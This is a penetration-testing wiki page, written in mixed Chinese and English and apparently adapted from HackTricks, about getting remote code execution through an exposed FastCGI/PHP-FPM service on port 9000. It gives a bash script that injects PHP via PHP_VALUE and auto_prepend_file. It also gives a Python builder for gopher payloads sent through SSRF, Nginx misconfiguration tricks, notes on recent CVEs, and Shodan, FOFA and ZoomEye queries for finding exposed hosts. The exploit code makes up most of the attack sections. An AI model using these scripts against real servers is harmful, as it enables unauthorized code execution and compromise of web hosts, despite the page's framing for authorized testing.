--- title: "9000 - Fastcgi" weight: 9000 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **9000 - FastCGI** 的渗透测试方法，适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 9000 渗透测试 FastCGI ### 基本信息 If you want to **learn what is FastCGI** check the following page: pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**. ### 信息收集 / Quick checks * **端口 scan:** `nmap -sV -p9000 ` (will often show "unknown" service; manually test). * **Probe FPM status page:** `SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000` (default php-fpm `pm.status_path`). * **Find reachable sockets via SSRF:** if an HTTP service is exploitable for SSRF, try `gopher://127.0.0.1:9000/_...` payloads to hit the FastCGI listener. * **Nginx misconfigs:** `cgi.fix_pathinfo=1` with `fastcgi_split_path_info` errors let you append `/.php` to static files and reach PHP (code exec via traversal). ### 远程代码执行 It's quite easy to make FastCGI execute arbitrary code:

Send FastCGI request that prepends PHP payload

```bash #!/bin/bash PAYLOAD="';" FILENAMES="/var/www/public/index.php" # Exisiting file path HOST=$1 B64=$(echo "$PAYLOAD"|base64) for FN in $FILENAMES; do OUTPUT=$(mktemp) env -i \ PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT cat $OUTPUT done ```

or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75) #### SSRF/gopher to FastCGI (when 9000 is not directly reachable) If you only control an **SSRF** primitive, you can still hit FastCGI using the gopher scheme and craft a full FastCGI request. 示例 payload builder:

Build and send a gopher FastCGI 远程代码执行 payload

```python import struct, socket host, port = "127.0.0.1", 9000 params = { b"REQUEST_METHOD": b"POST", b"SCRIPT_FILENAME": b"/var/www/html/index.php", b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1" } body = b"" def rec(rec_type, content, req_id=1): return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content def enc_params(d): out = b"" for k, v in d.items(): out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v return out payload = rec(4, enc_params(params)) + rec(4, b"") # FCGI_PARAMS + terminator payload += rec(5, body) # FCGI_STDIN s = socket.create_connection((host, port)) s.sendall(payload) print(s.recv(4096)) ``` Convert `payload` to URL-safe base64/percent-encoding and send via `gopher://host:9000/_` in your SSRF.

#### Notes on recent issues * **libfcgi <= 2.4.4 integer overflow (2024):** crafted `nameLen`/`valueLen` in FastCGI records can overflow on 32‑bit builds (common in embedded/IoT), yielding heap 远程代码执行 when the FastCGI socket is reachable (directly or via SSRF). * **PHP-FPM log manipulation (CVE-2024-9026):** when `catch_workers_output = yes`, attackers who can send FastCGI requests may truncate or inject up to 4 bytes per log line to erase indicators or poison logs. * **Classic Nginx + cgi.fix_pathinfo misconfig:** still widely seen; if `fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;` is used without file existence checks, any path ending in `.php` gets executed, enabling path traversal or source overwrite style gadgets. --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="9000" ``` #### Shodan ```bash # Shodan 搜索语法 port:9000 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:9000 ``` --- ## 📖 参考资料 - [HackTricks - 9000-fastcgi](https://book.hacktricks.wiki/en/network-services-pentesting/9000-fastcgi.html)